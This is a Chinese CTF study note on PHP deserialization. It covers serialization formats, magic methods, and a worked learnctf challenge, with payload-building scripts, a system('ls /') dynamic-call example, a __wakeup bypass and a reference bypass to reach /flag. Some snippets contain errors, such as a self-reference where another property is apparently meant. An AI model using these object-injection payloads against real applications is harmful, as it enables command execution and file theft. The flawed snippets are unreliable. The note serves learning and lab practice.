学习笔记

(先写目前学到的喵~,之前的后面会补上的)

[TOC]

反序列化是什么喵?

先来了解一下序列化叭:序列化就是将数据转化成一种可逆的数据结构,而逆向的过程就叫做反序列化。

序列化的目的:方便数据的传输与储存

序列化数组

1
2
3
4
5
$sites = array('baidu'=>'baidu123','count'=>10);//$sites创建一个数组
str = serialize($sites);//引入serialize()函数,对上面的数组进行序列化,得到字符串
$a2 = unserialize($str);//引入unserialize()函数,为反序列化函数,最后在网页得到的会与a的内容一样
echo $str;
echo var_dump($a2);//var_dump()函数接受数组或对象,并将其转化为一个方便打印的字符串

在网页中序列化之后得到:a:2:{s:5:”baidu”;s:13:”baidu123”;s:5:”count”;i:10;}

这里a为array(一个数组);s为string(一个字符串);i为int(一个整数)

2代表这个数组中有两个属性;5、13、5都代表的是属性的长度

在网页中反序列化格式:array(2){[“baidu”]=>string(13)”baidu123”[“count”]=>int(10)}

序列化对象

序列化时,只保存成员变量,不保存方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<? php
    class A{
    public $var1; //访问修饰符public,下面同理
    protected $var2;
    private $var3;
    function __construct($var1,$var2,$var3){
        $this -> var1 = $var1; //this 初始化一下喵
        $this -> var2 = $var2;//var1 之类的是属性名
        $this -> var3 = $var3;
    }
}
//序列化
$a = new A("hello","tom",5);//hello之类的是属性的值
$str = serialize($a);
$str2 = urlencode($str); //如果直接echo $str 可能会因为protected以及pravite的存在使得一些东西是没有被显示的,比如%00。所以此时进行urlencode就很好了,或者我们直接把protected以及private改为public也可以喵~
echo $str; //(1)
echo "<br>";
echo $str2;
//反序列化
$a2 = unserialize($str);
echo var_dump($a2);
?>

在网页中打印的字符:

(1)O:1:”A”:3:{s:4:”var1”;s:5:”hello”;s:7:”*var2”;s:3:”tom”;s:7:”Avar3”;i:5;} (这一整个是对象喵,

属性是对象的一部分喵)

note:

访问修饰符
public成员变量直接写
protected成员变量前面要加%00*%00(经过URL编码),%00是不可打印字符,所以这也是{}中第二个字符串长度为7 的原因
pravite成员变量前面要加上%00类名%00(这里类名为A)

类中的魔法方法

魔术方法是什么喵?

官方一点:在 PHP 中,以两个下划线 __ 开头的方法被称为“魔术方法”。它们是一些特殊的方法,不会被你显式地调用,而是在满足特定条件或发生特定事件时,由 PHP 自动触发执行的。

看不懂是干啥的对吧,我也看不懂

我说白了➡_➡:魔术方法的作用就是 我想干点啥(比如我想创建一个对象,我输入new A() ,php引擎就知道我想要干啥,他自己调用一个魔术方法(即__construct()函数)帮我干了这件事,而这个方法可以是我自己定义的【个人理解,如有错误以后会更改的QAQ】

常用的魔术方法喵~(其实还有好多,这里先了解这四个)
函数 作用
__construct() 函数 一个对象被创建时被调用
__destruct() 函数 一个对象被销毁时被调用(在整个php代码结束的时候)
__toString() 函数 当一个对象被当作字符串来使用时会被调用(常见场景:使用echo或print的时候被调用)
__wakeup()函数 当一个对象通过 unserialize() 函数被“反序列化”(唤醒)时被调用 好官方➡_➡其实就是在unserialize()一个对象之前被调用

注意:1)__toString()函数是有返回值的,必须返回一个string(字符串)类型的值。如果打印的是一个对象,就会输出 __toString() 方法返回的那个字符串

2)toString()函数和wakeup()函数的访问修饰符必须为public

SO,到现在也看不懂魔术方法能干什么对叭➡_➡,我也不知道,往下看看呢?

e.g.

1
2
3
4
5
6
7
8
function __destruct() {
    // 1. 将 "name" 属性的值赋给 $func 变量
    $func = $this->name;

    // 2. 将 $func 变量作为函数名来调用,
    //    并将 "age" 属性的值作为参数传递给这个函数
    $func($this->age); 
}

look at this ➡_➡

这段代码是什么意思呢?它实现了一个“动态函数调用”。

它把储存在对象属性 name 里的字符串,当作一个函数的名字

然后,它调用这个函数,并把 age 属性的值当作参数。

所以,试想一下,如果我把name里的值定为system

再把age属性的值定位ls /(或者 cat /flag, whoami 等任意命令)

1
2
$this->name = "system";
$this->age = "ls /";

那么上面那段代码就等价于

1
2
3
4
5
6
// $func 变成了 "system"
$func = "system"; 

// $func($this->age) 
// 实际上就等于调用:
system("ls /");

system("ls /"); 有什么作用不言而喻了吧?

是不是对魔术方法如何使用有一点点的了解了呢?OwO(今天就写到这叭,晚安喵)

OK,书接上回➡_➡,我们来浅看一道小题(题目来源于learnctf,侵权删QAQ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
highlight_file(__FILE__);

class Person {
    private $name;
    private $age;

    function __construct($name, $age) {
        $this->name = $name;
        $this->age = $age;
    }

    function __destruct() {
        if ($this->age === 19) {
            $func = $this->name;//瞧瞧这是什么?是不是又想套公式啦?这里只有age=19的情况下(并且是’===‘强相等),才会执行这两句代码,此路不通喵~
            $func($this->age);
        }
    }

    function __toString() {
        return file_get_contents($this->name);//看看又发现了什么好东西喵?file_get_contents()函数可以读取并返回一个文件的内容呢,那我们是不是可以尝试利用它来读取一下根目录哇?(Gloria最喜欢的flag一般都藏在那里呢~)
    }

    function __wakeup() {
        $this->age = 18;
    }


    function getName() {
        return $this->name;
    }

    function getAge() {
        return $this->age;
    }
}

$person = unserialize($_POST['person']);
if ($person === false) {
    die('please post data!');
}
echo $person;
?> 
please post data!

是不是有思路啦?我们就这样编写➡_➡

1
2
3
4
5
6
7
8
9
10
<?php
class Person {
    private $name = '/flag';
    private $age = 0; 
}
$a = new Person();
$str = serialize($a);
$str2 = urlencode($str);
echo $str2;
?>

得到序列化的内容,再post进去就好啦~是不是简单捏?

常见绕过

1)__wakeup()函数绕过

__wakeup()函数绕过
适用版本:PHP before 5.6.25 以及7.x before 7。0.10
原理:反序列化时,若表示对象属性个数的值大于真实的属性个数时,就会跳过__wakeup()函数的执行

来看栗子喵~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<? php
class Person {
    private $name;
    private $age;

    function __construct($name, $age) {
        $this->name = $name;
        $this->age = $age;
    }

    function __destruct() {
        $func = $this->name;
        $func($this->age);//在对象要被销毁的时候被调用(2)
    }

    function __wakeup() {
        $this->age = 18;//在进行serialize前会调用(1)
    }
}
?>

所以,__wakeup()是在__destruct()之前运行的,这会使得age的值永远等于18(这有什么后果捏?➡_➡

但我们是想利用__destruct()来查看根目录、获取flag,这根本没办法完成啊歪!

所以如果我们想要正常通过反序列化来得到flag就必须绕过__wakeup()函数(铿锵有力地说.jpg)

我们只需要把图中的2(真实的属性个数)改为任意一个比2大的数字(表示对象属性个数)就可以了喵~【注:图片只是其中的一步,并不全喵( ̄︶ ̄)↗】

2)引用绕过

&是引用符号喵~

来看个栗子~

1
2
3
4
5
6
7
8
9
10
11
12
13
class Person {
    private $name;
    private $age;

    function __destruct() {
        $this->age = uniqid();//一个新奇的东西喵~uniqid()函数返回的是一个唯一(unique)的id,所以age的值是无法猜测出来的
        if ($this->name === $this->age) {
            system('cat /flag');
        } else {
            echo 'no flag';
        }
    }
}

由php代码知,只有当name的值强等于age的值的时候,才会返回flag,但age的值又无法猜测,这怎么办哇?

这时候就需要用到引用,即&。那我们就这样写➡_➡

1
2
3
4
5
6
7
8
9
10
11
12
<?php
class Person {
    public $name;//看到没?我把private改为了public了
    public $age;
}
$a = new Person;
$a->age = '';//age的值就随意了(age 和name可以互换,看个人)
$a->name = &$a->age;//这段代码的意思是age的值是什么我name就引用什么,即name的值永远强等于age的值
$str = serialize($a);
$str2 = urlencode($str);
echo $str2;
?>

!这里有一个需要注意的点:为什么要把private改为public呢?

原本name和age都是私有的,在类外面是不能通过对象直接访问私有的,但改为public就不一样啦~

或者我们可以这样写php代码:

1
2
3
4
5
6
7
8
9
10
11
12
<? php
class Person{
    private $name;
    private $age;
    function __construct(){
        $this->age = '';
        $this->name = &$this->name; 
    }
}
$a = new Person;
echo urlencode(serialize($a));
?>

__construct()函数 是可以访问私有属性的喵~所以这样也可以获得flag啦

反序列化先到这里了喵~

这些只是最最基础的一部分,更深入的会在做题的过程中加入新的笔记或者wp喵~

Leave a comment

valine